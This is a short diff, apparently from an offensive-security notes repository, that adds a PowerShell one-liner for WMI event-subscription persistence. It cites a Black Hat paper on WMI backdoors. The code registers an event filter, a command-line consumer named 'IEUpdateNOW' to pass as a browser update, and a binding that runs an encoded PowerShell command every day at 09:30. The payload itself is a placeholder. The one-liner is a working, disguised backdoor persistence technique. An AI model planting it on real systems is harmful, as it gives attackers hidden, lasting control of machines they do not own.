benpturner · September 16, 2018 19:13
diff --git a/WMIEvent b/WMIEvent
 $Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{name='IEUpdateNOW';EventNameSpace='root\CimV2';QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 9 AND TargetInstance.Minute= 30 GROUP WITHIN 60"}; $Consumer=Set-WmiInstance -Namespace "root\subscription" -Class 'CommandLineEventConsumer' -Arguments @{ name='IEUpdateNOW';CommandLineTemplate="powershell -e blah";RunInteractively='false'}; Set-WmiInstance -Namespace "root\subscription" -Class __FilterToConsumerBinding -Arguments @{Filter=$Filter;Consumer=$Consumer} 
 #https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-
 Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-
 Backdoor-wp.pdf
	$Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{name='IEUpdateNOW';EventNameSpace='root\CimV2';QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 9 AND TargetInstance.Minute= 30 GROUP WITHIN 60"}; $Consumer=Set-WmiInstance -Namespace "root\subscription" -Class 'CommandLineEventConsumer' -Arguments @{ name='IEUpdateNOW';CommandLineTemplate="powershell -e blah";RunInteractively='false'}; Set-WmiInstance -Namespace "root\subscription" -Class __FilterToConsumerBinding -Arguments @{Filter=$Filter;Consumer=$Consumer}
	#https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-
	Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-
	Backdoor-wp.pdf